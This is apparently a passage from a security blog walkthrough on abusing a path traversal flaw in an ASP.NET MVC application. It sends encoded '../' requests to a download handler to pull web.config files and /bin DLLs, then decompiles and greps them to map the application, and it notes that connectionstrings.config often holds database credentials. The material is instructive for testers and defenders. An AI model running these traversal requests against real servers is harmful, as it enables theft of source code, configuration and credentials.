<span style="font-family: "courier new" , "courier" , monospace;"><span style="background-color: white;"> <bindingRedirect oldVersion="1.0.0.0-3.0.1.0" newVersion="3.0.1.0" /></span><br /><span style="background-color: white;"> </dependentAssembly></span><br /><span style="background-color: white;"> <dependentAssembly></span><br /><span style="background-color: white; color: #c7254e;"> </span><span style="background-color: #f9f2f4; color: #c7254e;"><<b>assemblyIdentity</b> name="Microsoft.Owin.Security.Cookies" /></span></span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="background-color: white;"> <bindingRedirect oldVersion="1.0.0.0-3.0.1.0" newVersion="3.0.1.0" /></span><br /><span style="background-color: white;"> </dependentAssembly></span><br /><span style="background-color: white;"> <dependentAssembly></span><br /><span style="background-color: white; color: #c7254e;"> </span><span style="background-color: #f9f2f4; color: #c7254e;"><<b>assemblyIdentity</b> name="Microsoft.Owin" /></span></span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="background-color: white;"> <bindingRedirect oldVersion="1.0.0.0-3.0.1.0" newVersion="3.0.1.0" /></span><br /><span style="background-color: white;"> </dependentAssembly></span><br /><span style="background-color: white;"> <dependentAssembly></span><br /><span style="color: #c7254e;"><span style="background-color: white;"> </span><span style="background-color: #f9f2f4;"><</span><b style="background-color: #f9f2f4;">assemblyIdentity</b><span style="background-color: #f9f2f4;"> name="Newtonsoft.Json" culture="neutral" /></span></span></span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="background-color: white;"> <bindingRedirect oldVersion="0.0.0.0-6.0.0.0" newVersion="6.0.0.0" /></span><br /><span style="background-color: white;"> </dependentAssembly></span><br /><span style="background-color: white;"> <dependentAssembly></span><br /><span style="color: #c7254e;"><span style="background-color: white;"> </span><span style="background-color: #f9f2f4;"><</span><b style="background-color: #f9f2f4;">assemblyIdentity</b><span style="background-color: #f9f2f4;"> name="System.Web.Optimization" /></span></span></span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="background-color: white;"> <bindingRedirect oldVersion="1.0.0.0-1.1.0.0" newVersion="1.1.0.0" /></span><br /><span style="background-color: white;"> </dependentAssembly></span><br /><span style="background-color: white;"> <dependentAssembly></span><br /><span style="background-color: white; color: #c7254e;"> </span><span style="background-color: #f9f2f4; color: #c7254e;"><<b>assemblyIdentity</b> name="WebGrease" /></span></span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="background-color: white;"> <bindingRedirect oldVersion="0.0.0.0-1.5.2.14234" newVersion="1.5.2.14234" /></span><br /><span style="background-color: white;"> </dependentAssembly></span><br /><span style="background-color: white;"> <dependentAssembly></span><br /><span style="background-color: white; color: #c7254e;"> </span><span style="background-color: #f9f2f4; color: #c7254e;"><<b>assemblyIdentity</b> name="System.Web.Helpers" /></span></span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="background-color: white;"> <bindingRedirect oldVersion="1.0.0.0-3.0.0.0" newVersion="3.0.0.0" /></span><br /><span style="background-color: white;"> </dependentAssembly></span></span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"><span style="background-color: white;"> <dependentAssembly></span><br /><span style="background-color: white; color: #c7254e;"> </span><span style="background-color: #f9f2f4; color: #c7254e;"><<b>assemblyIdentity</b> name="System.Web.Mvc" /></span></span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="background-color: white;"> <bindingRedirect oldVersion="1.0.0.0-5.2.3.0" newVersion="5.2.3.0" /></span><br /><span style="background-color: white;"> </dependentAssembly></span><br /><span style="background-color: white;"> <dependentAssembly></span><br /><span style="background-color: white; color: #c7254e;"> </span><span style="background-color: #f9f2f4; color: #c7254e;"><<b>assemblyIdentity</b> name="System.Web.WebPages" /></span></span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="background-color: white;"> <bindingRedirect oldVersion="1.0.0.0-3.0.0.0" newVersion="3.0.0.0" /></span><br /><span style="background-color: white;"> </dependentAssembly></span><br /><span style="background-color: white;"> </assemblyBinding></span><br /><span style="background-color: white;"> </runtime></span><br /><span style="background-color: white;"> <entityFramework></span><br /><span style="background-color: white;"> <defaultConnectionFactory type="System.Data.Entity.Infrastructure.LocalDbConnectionFactory, EntityFramework"></span><br /><span style="background-color: white;"> <parameters></span><br /><span style="background-color: white;"> <parameter value="mssqllocaldb" /></span><br /><span style="background-color: white;"> </parameters></span><br /><span style="background-color: white;"> </defaultConnectionFactory></span><br /><span style="background-color: white;"> <providers></span><br /><span style="background-color: white;"> <provider invariantName="System.Data.SqlClient" type="System.Data.Entity.SqlServer.SqlProviderServices, EntityFramework.SqlServer" /></span><br /><span style="background-color: white;"> </providers></span><br /><span style="background-color: white;"> </entityFramework></span><br /><span style="background-color: white;"> <system.codedom></span><br /><span style="background-color: white;"> <compilers></span><br /><span style="background-color: white;"> <compiler language="c#;cs;csharp" extension=".cs" type="Microsoft.CodeDom.Providers.DotNetCompilerPlatform.CSharpCodeProvider, Microsoft.CodeDom.Providers.DotNetCompilerPlatform, Version=1.0.0.0, Culture=neutral" warningLevel="4" compilerOptions="/langversion:6 /nowarn:1659;1699;1701" /></span><br /><span style="background-color: white;"> <compiler language="vb;vbs;visualbasic;vbscript" extension=".vb" type="Microsoft.CodeDom.Providers.DotNetCompilerPlatform.VBCodeProvider, 
Microsoft.CodeDom.Providers.DotNetCompilerPlatform, Version=1.0.0.0, Culture=neutral" warningLevel="4" compilerOptions="/langversion:14 /nowarn:41008 /define:_MYTYPE=\&quot;Web\&quot; /optionInfer+" /></span><br /><span style="background-color: white;"> </compilers></span><br /><span style="background-color: white;"> </system.codedom></span><br /><span style="background-color: white;"></configuration></span></span><br />
<br />
<div style="text-align: justify;">
Other files that could be found in the root directory of a .Net application:</div>
</div>
<div>
<h4 style="text-align: justify;">
/global.asax</h4>
<span style="background-color: white; font-family: "courier new" , "courier" , monospace;"><%@ Application Codebehind="Global.asax.cs" Inherits="WebApplication1.MvcApplication" Language="C#" %></span><br />
<br />
<h4>
/connectionstrings.config</h4>
<div>
<b>Note:</b> this file holds the connection strings, so it usually contains database credentials.<br />
<br /></div>
<span style="background-color: white; font-family: "courier new" , "courier" , monospace;"><connectionStrings></span><br />
<span style="background-color: white; font-family: "courier new" , "courier" , monospace;"> <add name="DefaultConnection" <b>connectionString</b>="Data Source=(LocalDb)\MSSQLLocalDB;AttachDbFilename [...]" providerName="System.Data.SqlClient" /></span><br />
<span style="background-color: white; font-family: "courier new" , "courier" , monospace;"></connectionStrings></span></div>
<div>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbnHsuSBNrBZgsHTGBopoPo6jxngDgQe8dbUazsqAPZctQnX_JWnVXKGWQDjgNzAIL5Af2-cDku664ZyekH18Qd_TIDCtcWDCSqw_Kt5e62_QmH69qe4qTrhqsXD4ujL8FJb8obGuH3yJQ/s1600/2.png" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" data-original-height="714" data-original-width="427" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbnHsuSBNrBZgsHTGBopoPo6jxngDgQe8dbUazsqAPZctQnX_JWnVXKGWQDjgNzAIL5Af2-cDku664ZyekH18Qd_TIDCtcWDCSqw_Kt5e62_QmH69qe4qTrhqsXD4ujL8FJb8obGuH3yJQ/s640/2.png" width="382" /></a><br />
<div style="text-align: justify;">
<br />
In addition, .Net MVC applications define further web.config files, whose purpose is to declare the namespaces available to each set of view pages, relieving developers from writing "@using" directives in every view.<br />
As shown in the picture, representing a VisualStudio MVC/Razor project for a simple application, the main Views folder includes a web.config file:</div>
<div style="text-align: justify;">
</div>
<ul>
<li>/Views/Web.config</li>
</ul>
<b>Note:</b> the /Views folder is part of the Razor View Engine configuration.<br />
<br />
<div style="text-align: justify;">
If the application uses Areas, consider that each Area with graphical interface capabilities could have a dedicated ./Views folder containing a Web.config file for further specific namespaces.</div>
<ul>
<li><area-name-1>/Views/web.config</li>
<li><area-name-2>/Views/web.config</li>
</ul>
<div style="text-align: justify;">
<br />
Any /Views and <area-name>/Views directory may contain a web.config file, which can be downloaded via the same Path Traversal: the BlockViewHandler registered in these files only answers direct HTTP requests for the /Views folder with a 404, it does not restrict what the application's own download handler reads from disk.<br />
<br />
Web.config files may refer to other classes via the "<span style="font-family: "courier new" , "courier" , monospace;">type=</span>" attribute, as well as new namespaces.<br />
<br /></div>
<div style="text-align: justify;">
Request:</div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">GET /download_page?id=<b>..%2f..%2fViews/web.config</b> HTTP/1.1</span></div>
<div>
<span style="background-color: white; font-family: "courier new" , "courier" , monospace;">Host: example-mvc-application.minded</span></div>
<div>
<span style="background-color: white; font-family: "courier new" , "courier" , monospace;">[...]</span></div>
<div>
<br /></div>
<div>
Response:<br />
<span style="background-color: white; font-family: "courier new" , "courier" , monospace;">HTTP/1.1 200 OK</span></div>
<div>
<span style="background-color: white; font-family: "courier new" , "courier" , monospace;">[...]</span></div>
<div>
<span style="background-color: white; font-family: "courier new" , "courier" , monospace;"><?xml version="1.0"?><br /><configuration></span><br />
<span style="background-color: white; font-family: "courier new" , "courier" , monospace;"> <configSections></span></div>
<div>
<span style="background-color: white; color: #c7254e; font-family: "courier new" , "courier" , monospace;"> </span><span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;"><sectionGroup name="system.web.webPages.razor" <b>type</b>="System.Web.WebPages.Razor.Configuration.RazorWebSectionGroup, System.Web.WebPages.Razor, Version=3.0.0.0, Culture=neutral"></span><br />
<span style="color: #c7254e;"><span style="font-family: "courier new" , "courier" , monospace;"><span style="background-color: white;"> </span><span style="background-color: #f9f2f4;"><section name="host" </span></span><b style="background-color: #f9f2f4; font-family: "courier new", courier, monospace;">type</b><span style="background-color: #f9f2f4; font-family: "courier new" , "courier" , monospace;">="System.Web.WebPages.Razor.Configuration.HostSection, System.Web.WebPages.Razor, Version=3.0.0.0, Culture=neutral" requirePermission="false" /></span></span><br />
<span style="color: #c7254e;"><span style="font-family: "courier new" , "courier" , monospace;"><span style="background-color: white;"> </span><span style="background-color: #f9f2f4;"><section name="pages" </span></span><b style="background-color: #f9f2f4; font-family: "courier new", courier, monospace;">type</b><span style="background-color: #f9f2f4; font-family: "courier new" , "courier" , monospace;">="System.Web.WebPages.Razor.Configuration.RazorPagesSection, System.Web.WebPages.Razor, Version=3.0.0.0, Culture=neutral" requirePermission="false" /></span></span><br />
<span style="background-color: white; font-family: "courier new" , "courier" , monospace;"> </sectionGroup></span></div>
<div>
<span style="background-color: white; font-family: "courier new" , "courier" , monospace;"> </configSections><br /><system.web.webPages.razor><host factoryType="System.Web.Mvc.MvcWebRazorHostFactory, System.Web.Mvc, Version=5.2.3.0, Culture=neutral" /><pages pageBaseType="System.Web.Mvc.WebViewPage"></span><br />
<span style="background-color: white; font-family: "courier new" , "courier" , monospace;"> <namespaces></span><br />
<span style="background-color: white; color: #c7254e; font-family: "courier new" , "courier" , monospace;"> </span><span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;"><add <b>namespace</b>="System.Web.Mvc" /></span><br />
<span style="background-color: white; color: #c7254e; font-family: "courier new" , "courier" , monospace;"> </span><span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;"><add <b>namespace</b>="System.Web.Mvc.Ajax" /></span><br />
<span style="background-color: white; color: #c7254e; font-family: "courier new" , "courier" , monospace;"> </span><span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;"><add <b>namespace</b>="System.Web.Mvc.Html" /></span><br />
<span style="background-color: white; color: #c7254e; font-family: "courier new" , "courier" , monospace;"> </span><span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;"><add <b>namespace</b>="System.Web.Optimization"/></span><br />
<span style="background-color: white; color: #c7254e; font-family: "courier new" , "courier" , monospace;"> </span><span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;"><add <b>namespace</b>="System.Web.Routing" /></span><br />
<span style="color: #c7254e; font-family: "courier new" , "courier" , monospace;"><b><i style="background-color: white;"> </i><i style="background-color: #f9f2f4;"><add namespace="WebApplication1" /></i></b></span><br />
<span style="background-color: white; font-family: "courier new" , "courier" , monospace;"> </namespaces></span><br />
<span style="background-color: white; font-family: "courier new" , "courier" , monospace;"></pages></span><br />
<span style="background-color: white; font-family: "courier new" , "courier" , monospace;"></system.web.webPages.razor><br /><appSettings><add key="webpages:Enabled" value="false" /></appSettings><br /><system.webServer><handlers><remove name="BlockViewHandler"/><add name="BlockViewHandler" path="*" verb="*" preCondition="integratedMode" type="System.Web.HttpNotFoundHandler" /></handlers></system.webServer><br /><system.web><compilation><assemblies><add assembly="System.Web.Mvc, Version=5.2.3.0, Culture=neutral" /></assemblies></compilation></system.web></configuration></span><br />
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;"><br /></span></div>
<div>
<h3>
Download the first DLL</h3>
<div style="text-align: justify;">
From a very shallow analysis, the declaration of a custom namespace (the other namespaces are defaults) suggests that an assembly called "WebApplication1.dll" is present in the /bin directory, since Visual Studio sets the assembly name equal to the project's root namespace by default.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Request:</div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">GET /download_page?id=<b>..%2f..%2fbin/WebApplication1.dll</b> HTTP/1.1</span><br />
<span style="background-color: white; font-family: "courier new" , "courier" , monospace;">Host: example-mvc-application.minded</span><br />
<span style="background-color: white; font-family: "courier new" , "courier" , monospace;">[...]</span><br />
<br />
Response:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiV1MjChhqW9OGvOoiTF3B_aM9rSN8FJDosSh2fwKMvrgsTDTnWXKimVvS5WknDxAufn2bLMsev2APDgYlkohUib8lwQVWsUx1h9WBYEhpvzD_23sHd2VlOjlUoNZmj9UoV6lq7STkJmezh/s1600/3.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="139" data-original-width="121" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiV1MjChhqW9OGvOoiTF3B_aM9rSN8FJDosSh2fwKMvrgsTDTnWXKimVvS5WknDxAufn2bLMsev2APDgYlkohUib8lwQVWsUx1h9WBYEhpvzD_23sHd2VlOjlUoNZmj9UoV6lq7STkJmezh/s1600/3.png" /></a></div>
<div style="text-align: justify;">
Therefore, the DLL file can be decompiled with tools like <a href="https://www.red-gate.com/products/dotnet-development/reflector/index" target="_blank">.NET Reflector</a>, in order to obtain the source code of the related part of the web application, and additional information to advance in the attack.<br />
<br /></div>
<div style="text-align: justify;">
Decompiling the main DLL shows several details about the internal structure of the application, and its dependencies and modules.</div>
<div style="text-align: justify;">
In fact, Area names (Areas are the semi-independent sections an MVC application is divided into) are defined in the main assembly, in the AreaRegistration subclasses that register the routes of each Area:</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyOIhmzePG1CrWRoSaO705lmAhA4rwFKauyTE3Pq2-kgudvSULtLGOBBHdJs41WWNyovpTJ0InOzTKb2zNZycsi7FogDCdLUStUYRAc_SB5mt-LKTzHWFVrSrLZsmXLUcI4fkFuyLJOrBQ/s1600/4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="527" data-original-width="849" height="395" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyOIhmzePG1CrWRoSaO705lmAhA4rwFKauyTE3Pq2-kgudvSULtLGOBBHdJs41WWNyovpTJ0InOzTKb2zNZycsi7FogDCdLUStUYRAc_SB5mt-LKTzHWFVrSrLZsmXLUcI4fkFuyLJOrBQ/s640/4.png" width="640" /></a></div>
<h4>
Results</h4>
<ul>
<li style="text-align: justify;">The namespace <b>WebApplication1.Areas.Minded</b> corresponds to the namesake area, i.e. a section of the application which is most likely to be accessed with a path similar to <i><b>https://example-mvc-application.minded/area-name/</b></i>.</li>
<li style="text-align: justify;"><b>Routeconfig.cs</b> file has been extracted to understand the specific rules the application follows to translate URLs to Controllers (which can be considered as the web handlers of the application).</li>
</ul>
<div style="text-align: justify;">
<br /></div>
<h3 style="text-align: justify;">
Extend the attack surface</h3>
From the definition of an Area, an attacker can infer that other web.config files are present in the application, at guessable default paths such as /area-name/Views/ (in the default Visual Studio layout, /Areas/area-name/Views/), containing specific configurations that may refer to other DLL files present in the /bin folder.<br />
<br />
Request:<br />
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">GET /download_page?id=<b>..%2f..%2fMinded/Views/web.config</b> HTTP/1.1</span><br />
<span style="background-color: white; font-family: "courier new" , "courier" , monospace;">Host: example-mvc-application.minded</span><br />
<span style="background-color: white; font-family: "courier new" , "courier" , monospace;">[...]</span><br />
<br />
Response:<br />
<span style="background-color: white; font-family: "courier new" , "courier" , monospace;">HTTP/1.1 200 OK</span><br />
<span style="background-color: white; font-family: "courier new" , "courier" , monospace;">[...]</span><br />
<span style="background-color: white; font-family: "courier new" , "courier" , monospace;"><?xml version="1.0"?></span><br />
<span style="background-color: white; font-family: "courier new" , "courier" , monospace;"><configuration></span><br />
<span style="background-color: white; font-family: "courier new" , "courier" , monospace;"><configSections></span><br />
<span style="background-color: white; font-family: "courier new" , "courier" , monospace;"> </span><span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;"><sectionGroup name="system.web.webPages.razor" </span><b style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new", courier, monospace;">type</b><span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">="System.Web.WebPages.Razor.Configuration.RazorWebSectionGroup, System.Web.WebPages.Razor, Version=3.0.0.0, Culture=neutral"></span><br />
<span style="background-color: white; color: #c7254e; font-family: "courier new" , "courier" , monospace;"> </span><span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;"><section name="host" </span><b style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new", courier, monospace;">type</b><span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">="System.Web.WebPages.Razor.Configuration.HostSection, System.Web.WebPages.Razor, Version=3.0.0.0, Culture=neutral" requirePermission="false" /></span><br />
<span style="background-color: white; color: #c7254e; font-family: "courier new" , "courier" , monospace;"> </span><span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;"><section name="pages" </span><b style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new", courier, monospace;">type</b><span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">="System.Web.WebPages.Razor.Configuration.RazorPagesSection, System.Web.WebPages.Razor, Version=3.0.0.0, Culture=neutral" requirePermission="false" /></span><br />
<span style="background-color: white; font-family: "courier new" , "courier" , monospace;"> </sectionGroup></span><br />
<span style="background-color: white; font-family: "courier new" , "courier" , monospace;"></configSections></span><br />
<span style="background-color: white; font-family: "courier new" , "courier" , monospace;"><system.web.webPages.razor><host factoryType="System.Web.Mvc.MvcWebRazorHostFactory, System.Web.Mvc, Version=5.2.3.0, Culture=neutral" /></span><br />
<span style="background-color: white; font-family: "courier new" , "courier" , monospace;"><pages pageBaseType="System.Web.Mvc.WebViewPage"></span><br />
<span style="background-color: white; font-family: "courier new" , "courier" , monospace;"><namespaces></span><br />
<span style="background-color: white; color: #c7254e; font-family: "courier new" , "courier" , monospace;"> </span><span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;"><add <b>namespace</b>="System.Web.Mvc" /></span><br />
<span style="background-color: white; color: #c7254e; font-family: "courier new" , "courier" , monospace;"> </span><span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;"><add <b>namespace</b>="System.Web.Mvc.Ajax" /></span><br />
<span style="background-color: white; color: #c7254e; font-family: "courier new" , "courier" , monospace;"> </span><span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;"><add <b>namespace</b>="System.Web.Mvc.Html" /></span><br />
<span style="background-color: white; color: #c7254e; font-family: "courier new" , "courier" , monospace;"> </span><span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;"><add <b>namespace</b>="System.Web.Routing" /></span><br />
<span style="background-color: white; color: #c7254e; font-family: "courier new" , "courier" , monospace;"> </span><span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;"><add <b>namespace</b>="System.Web.Optimization" /></span><br />
<span style="background-color: white; color: #c7254e; font-family: "courier new" , "courier" , monospace;"> </span><span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;"><add <b>namespace</b>="WebApplication1" /></span><br />
<span style="color: #c7254e; font-family: "courier new" , "courier" , monospace;"><b><i style="background-color: white;"> </i><i style="background-color: #f9f2f4;"><add namespace="WebApplication1.AdditionalFeatures" /></i></b></span><br />
<span style="background-color: white; font-family: "courier new" , "courier" , monospace;"></namespaces></span><br />
<span style="background-color: white; font-family: "courier new" , "courier" , monospace;"></pages></span><br />
<span style="background-color: white; font-family: "courier new" , "courier" , monospace;"></system.web.webPages.razor></span><br />
<span style="background-color: white; font-family: "courier new" , "courier" , monospace;"><appSettings><add key="webpages:Enabled" value="false" /></appSettings></span><br />
<span style="background-color: white; font-family: "courier new" , "courier" , monospace;"><system.webServer><handlers><remove name="BlockViewHandler"/><add name="BlockViewHandler" path="*" verb="*" preCondition="integratedMode" type="System.Web.HttpNotFoundHandler" /></handlers></span><br />
<span style="background-color: white; font-family: "courier new" , "courier" , monospace;"></system.webServer></span><br />
<span style="background-color: white; font-family: "courier new" , "courier" , monospace;"></configuration></span><br />
<br />
<h4>
Attacker's loot so far</h4>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">C:\WebApplication1> dir /b /s web.config</span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">C:\WebApplication1\Web.config</span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">C:\WebApplication1\Views\Web.config</span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">C:\WebApplication1\Areas\Minded\Views\web.config</span><br />
<br />
<div style="text-align: justify;">
All the web.config files have been downloaded, and they can be inspected for specific references, disclosing details on the /bin directory.</div>
<div style="text-align: justify;">
<br />
<h3>
Filename extraction cheat-sheet</h3>
<div>
The most relevant XML elements and attributes an attacker would look at to identify the DLLs of an MVC application are the declarations of namespaces, the inclusions of assembly files, and any reference to types:</div>
<div>
<ul>
<li><span style="font-family: "courier new" , "courier" , monospace;">"namespace"</span></li>
<li><span style="font-family: "courier new" , "courier" , monospace;">"assemblyIdentity"</span></li>
<li><span style="font-family: "courier new" , "courier" , monospace;">" type="</span></li>
</ul>
<div>
<br /></div>
</div>
</div>
<h4>
Extract additional namespaces </h4>
<div>
Every web.config file, both for Areas and for the main Views configuration, includes references to any namespace it depends on:<br />
<br /></div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;"><b>$ grep -Ri namespace | grep -v namespaces | cut -d'"' -f 1-2</b></span><br />
<br />
<br />
<span style="font-family: "courier new" , "courier" , monospace;">Areas/Minded/Views/web.config: <add namespace="<b><span style="background-color: #f9f2f4; color: #c7254e;">System.Web.Mvc</span></b><br />
Areas/Minded/Views/web.config: <add namespace="<b><span style="background-color: #f9f2f4; color: #c7254e;">System.Web.Mvc.Ajax</span></b><br />
Areas/Minded/Views/web.config: <add namespace="<b><span style="background-color: #f9f2f4; color: #c7254e;">System.Web.Mvc.Html</span></b><br />
Areas/Minded/Views/web.config: <add namespace="<b><span style="background-color: #f9f2f4; color: #c7254e;">System.Web.Routing</span></b><br />
Areas/Minded/Views/web.config: <add namespace="<b><span style="background-color: #f9f2f4; color: #c7254e;">System.Web.Optimization</span></b><br />
Areas/Minded/Views/web.config: <add namespace="<b><span style="background-color: #f9f2f4; color: #c7254e;">WebApplication1</span></b><br />
Areas/Minded/Views/web.config: <add namespace="<b><span style="background-color: #f9f2f4; color: #c7254e;">WebApplication1.AdditionalFeatures</span></b><br />
Views/Web.config: <add namespace="<b><span style="background-color: #f9f2f4; color: #c7254e;">System.Web.Mvc</span></b><br />
Views/Web.config: <add namespace="<b><span style="background-color: #f9f2f4; color: #c7254e;">System.Web.Mvc.Ajax</span></b><br />
Views/Web.config: <add namespace="<b><span style="background-color: #f9f2f4; color: #c7254e;">System.Web.Mvc.Html</span></b><br />
Views/Web.config: <add namespace="<b><span style="background-color: #f9f2f4; color: #c7254e;">System.Web.Optimization</span></b><br />
Views/Web.config: <add namespace="<b><span style="background-color: #f9f2f4; color: #c7254e;">System.Web.Routing</span></b><br />
Views/Web.config: <add namespace="<b><span style="background-color: #f9f2f4; color: #c7254e;">WebApplication1</span></b></span><br />
<br />
<h4>
Extract additional assemblies that are referenced within the web application</h4>
The binary files (assemblies) the application needs in order to run are declared in the main web.config file:<br />
<br />
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;"><b>$ grep -Ri assemblyidentity | cut -d'"' -f 1-2</b></span><br />
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;"><b><br /></b></span>
<span style="font-family: "courier new" , "courier" , monospace;"><span style="background-color: white;">Web.config: <assemblyIdentity name="</span><b><span style="background-color: #f9f2f4; color: #c7254e;">Microsoft.Owin.Security</span></b></span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="background-color: white;">Web.config: <assemblyIdentity name="</span><b style="background-color: #f9f2f4;"><span style="color: #c7254e;">Microsoft.Owin.Security.OAuth</span></b></span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="background-color: white;">Web.config: <assemblyIdentity name="</span><b><span style="background-color: #f9f2f4; color: #c7254e;">Microsoft.Owin.Security.Cookies</span></b></span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="background-color: white;">Web.config: <assemblyIdentity name="</span><b><span style="background-color: #f9f2f4; color: #c7254e;">Microsoft.Owin</span></b></span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="background-color: white;">Web.config: <assemblyIdentity name="</span><b><span style="background-color: #f9f2f4; color: #c7254e;">Newtonsoft.Json</span></b></span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="background-color: white;">Web.config: <assemblyIdentity name="</span><b><span style="background-color: #f9f2f4; color: #c7254e;">System.Web.Optimization</span></b></span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="background-color: white;">Web.config: <assemblyIdentity name="</span><b><span style="background-color: #f9f2f4; color: #c7254e;">WebGrease</span></b></span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="background-color: white;">Web.config: <assemblyIdentity name="</span><b><span style="background-color: #f9f2f4; color: #c7254e;">System.Web.Helpers</span></b></span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="background-color: white;">Web.config: <assemblyIdentity name="</span><b><span style="background-color: #f9f2f4; color: #c7254e;">System.Web.Mvc</span></b></span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="background-color: white;">Web.config: <assemblyIdentity name="</span><b><span style="background-color: #f9f2f4; color: #c7254e;">System.Web.WebPages</span></b></span><br />
<br />
<h4>
Extract section group’s namespaces</h4>
<div style="text-align: justify;">
Within the sectionGroup XML element of a web.config file, the comma-separated component of the "type" attribute immediately before Version refers to additional namespaces the application may need:</div>
<br />
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;"><b>$ grep -ri " type=" | grep -v compiler | cut -d'"' -f 1-4</b></span><br />
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;"><b><br /></b></span>
<span style="background-color: white; font-family: "courier new" , "courier" , monospace;">Areas/Minded/Views/web.config: <sectionGroup name="system.web.webPages.razor" <span style="color: #c7254e;"><span style="background-color: #f9f2f4;"><b>type</b></span></span>="System.Web.WebPages.Razor.Configuration.RazorWebSectionGroup, <span style="background-color: #f9f2f4;"><span style="color: #c7254e;"><b>System.Web.WebPages.Razor</b></span></span>, Version=3.0.0.0, Culture=neutral</span><br />
<span style="background-color: white; font-family: "courier new" , "courier" , monospace;">Areas/Minded/Views/web.config: <section name="host" <span style="color: #c7254e;"><span style="background-color: #f9f2f4;"><b>type</b></span></span>="System.Web.WebPages.Razor.Configuration.HostSection, <span style="background-color: #f9f2f4;"><span style="color: #c7254e;"><b>System.Web.WebPages.Razor</b></span></span>, Version=3.0.0.0, Culture=neutral</span><br />
<span style="background-color: white; font-family: "courier new" , "courier" , monospace;">Areas/Minded/Views/web.config: <section name="pages" <span style="color: #c7254e;"><span style="background-color: #f9f2f4;"><b>type</b></span></span>="System.Web.WebPages.Razor.Configuration.RazorPagesSection, <span style="color: #c7254e;"><span style="background-color: #f9f2f4;"><b>System.Web.WebPages.Razor</b></span></span>, Version=3.0.0.0, Culture=neutral</span><br />
<span style="background-color: white; font-family: "courier new" , "courier" , monospace;">Areas/Minded/Views/web.config: <add name="BlockViewHandler" path="*</span><br />
